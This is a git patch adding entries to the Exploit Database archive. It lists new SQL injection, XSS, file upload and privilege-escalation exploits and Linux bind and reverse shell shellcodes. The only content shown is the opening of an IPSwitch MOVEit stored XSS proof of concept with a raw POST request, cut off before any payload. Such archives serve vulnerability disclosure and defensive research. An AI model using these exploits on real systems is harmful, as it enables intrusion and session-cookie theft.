From d12dffd438c850ba2c45106a90ad30fd7f4d3b13 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 3 Feb 2018 05:01:48 +0000 Subject: [PATCH] DB: 2018-02-03 21 changes to exploits/shellcodes Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection Event Manager 1.0 - SQL Injection Fancy Clone Script - 'search_browse_product' SQL Injection Real Estate Custom Script - 'route' SQL Injection Advance Loan Management System - 'id' SQL Injection IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Joomla! Component JMS Music 1.1.1 - SQL Injection Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal FiberHome AN5506 - Unauthenticated Remote DNS Change Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes) Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode --- exploits/aspx/webapps/43947.txt | 45 ++ exploits/hardware/webapps/43961.txt | 54 ++ exploits/multiple/webapps/43960.py | 197 +++++ exploits/php/webapps/43940.html | 32 + exploits/php/webapps/43941.txt | 49 ++ exploits/php/webapps/43942.txt | 37 + exploits/php/webapps/43943.txt | 45 ++ exploits/php/webapps/43948.html | 33 + exploits/php/webapps/43949.txt | 27 + exploits/php/webapps/43950.txt | 26 + exploits/php/webapps/43957.txt | 26 + exploits/php/webapps/43958.txt | 27 + exploits/php/webapps/43959.txt | 71 ++ exploits/windows/local/43962.c | 450 +++++++++++ 
exploits/windows/webapps/43883.txt | 2 +- files_exploits.csv | 14 + files_shellcodes.csv | 6 + shellcodes/generator/43955.py | 124 +++ shellcodes/linux_x86-64/43951.nasm | 112 +++ shellcodes/linux_x86-64/43952.nasm | 89 +++ shellcodes/linux_x86-64/43953.nasm | 23 + shellcodes/linux_x86-64/43954.nasm | 37 + shellcodes/linux_x86-64/43956.c | 1087 +++++++++++++++++++++++++++ 23 files changed, 2612 insertions(+), 1 deletion(-) create mode 100644 exploits/aspx/webapps/43947.txt create mode 100644 exploits/hardware/webapps/43961.txt create mode 100755 exploits/multiple/webapps/43960.py create mode 100644 exploits/php/webapps/43940.html create mode 100644 exploits/php/webapps/43941.txt create mode 100644 exploits/php/webapps/43942.txt create mode 100644 exploits/php/webapps/43943.txt create mode 100644 exploits/php/webapps/43948.html create mode 100644 exploits/php/webapps/43949.txt create mode 100644 exploits/php/webapps/43950.txt create mode 100644 exploits/php/webapps/43957.txt create mode 100644 exploits/php/webapps/43958.txt create mode 100644 exploits/php/webapps/43959.txt create mode 100644 exploits/windows/local/43962.c create mode 100755 shellcodes/generator/43955.py create mode 100644 shellcodes/linux_x86-64/43951.nasm create mode 100644 shellcodes/linux_x86-64/43952.nasm create mode 100644 shellcodes/linux_x86-64/43953.nasm create mode 100644 shellcodes/linux_x86-64/43954.nasm create mode 100644 shellcodes/linux_x86-64/43956.c diff --git a/exploits/aspx/webapps/43947.txt b/exploits/aspx/webapps/43947.txt new file mode 100644 index 000000000..24e0b5fe1 --- /dev/null +++ b/exploits/aspx/webapps/43947.txt 
@@ -0,0 +1,45 @@
+# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
+# Date: 1-31-2017
+# Software Link: https://www.ipswitch.com/moveit
+# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
+# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security)
+# Contact: https://twitter.com/crowdshield
+# Vendor Homepage: https://www.ipswitch.com
+# Category: Webapps
+# Attack Type: Remote
+# Impact: Data/Cookie Theft
+
+
+1. Description
+
+IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.
+
+
+2. Proof of Concept
+
+The vulnerability lies in the Send Message -> Body Text Area input field.
+
+POST /human.aspx?r=692492538 HTTP/1.1
+Host: host.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: https://host.com/human.aspx?r=510324925
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 598
+
+czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=